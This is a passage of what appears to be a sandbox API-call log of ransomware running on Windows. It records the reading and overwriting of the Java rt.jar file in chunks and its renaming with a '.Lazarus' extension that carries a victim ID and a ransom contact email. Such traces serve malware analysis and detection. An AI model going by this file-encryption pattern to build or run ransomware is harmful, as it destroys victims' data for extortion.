ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa90a30aa, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa7233eb, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x340865b, dwReserved0=0x286af2e0, dwReserved1=0x238d603c, cFileName="rt.jar", cAlternateFileName="")) returned 1 [0097.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0097.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0097.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0097.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0097.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0097.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0097.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0097.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0097.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0097.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0097.767] AreFileApisANSI () returned 1 [0097.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar", lpUsedDefaultChar=0x0) returned 46 [0097.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0097.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.768] AreFileApisANSI () returned 1 [0097.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0097.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0097.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 46 [0097.768] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.771] GetFileType (hFile=0x360) returned 0x1 [0097.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0097.771] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.771] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.772] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.772] CloseHandle (hObject=0x360) returned 1 [0097.772] AreFileApisANSI () returned 1 [0097.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0097.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0097.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 46 [0097.772] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.772] GetFileType (hFile=0x360) returned 0x1 [0097.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0097.772] CloseHandle (hObject=0x360) returned 1 [0097.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.773] AreFileApisANSI () returned 1 [0097.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0097.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0097.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 46 [0097.773] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa90a30aa, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa90a30aa, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa7233eb, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x340865b)) returned 1 [0097.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0097.773] AreFileApisANSI () returned 1 [0097.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0097.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.773] GetLastError () returned 0x0 [0097.773] SetLastError (dwErrCode=0x0) [0097.774] AreFileApisANSI () returned 1 [0097.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0097.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0097.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 46 [0097.774] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.774] GetFileType (hFile=0x360) returned 0x1 [0097.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0097.774] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0097.774] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0097.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0097.781] ReadFile (in: hFile=0x360, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0097.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0097.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0097.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e030 [0097.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x986d0 [0097.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0097.782] GetLastError () returned 0x0 [0097.782] SetLastError (dwErrCode=0x0) [0097.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0097.783] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0097.783] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0097.783] WriteFile (in: hFile=0x360, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0097.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0097.783] CloseHandle (hObject=0x360) returned 1 [0097.784] AreFileApisANSI () returned 1 [0097.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0097.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0097.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 46 [0097.784] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.784] GetFileType (hFile=0x360) returned 0x1 [0097.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0097.784] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0097.784] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0097.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x998e8 [0097.786] ReadFile (in: hFile=0x360, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0097.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0097.787] GetLastError () returned 0x0 [0097.787] SetLastError (dwErrCode=0x0) [0097.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.787] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0097.787] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0097.788] WriteFile (in: hFile=0x360, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0097.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x998e8 | out: hHeap=0x20000) returned 1 [0097.788] CloseHandle (hObject=0x360) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x719c8 [0097.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aeb0 [0097.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0097.788] AreFileApisANSI () returned 1 [0097.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0097.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71828 [0097.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71828, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar") returned 46 [0097.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8aeb0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0097.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x4ebc8 [0097.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8aeb0, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=108 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0097.788] MoveFileExW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0097.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0097.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0097.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0097.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0097.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0097.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0097.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0097.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.790] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1418338, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x22f63430, dwReserved1=0xbf5225f0, cFileName="security", cAlternateFileName="")) returned 1 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0097.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0097.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0097.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0097.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0097.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0097.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.790] AreFileApisANSI () returned 1 [0097.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security", lpUsedDefaultChar=0x0) returned 48 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0097.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0097.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.791] AreFileApisANSI () returned 1 [0097.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0097.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0097.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security") returned 48 [0097.791] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security" (normalized: "c:\\program 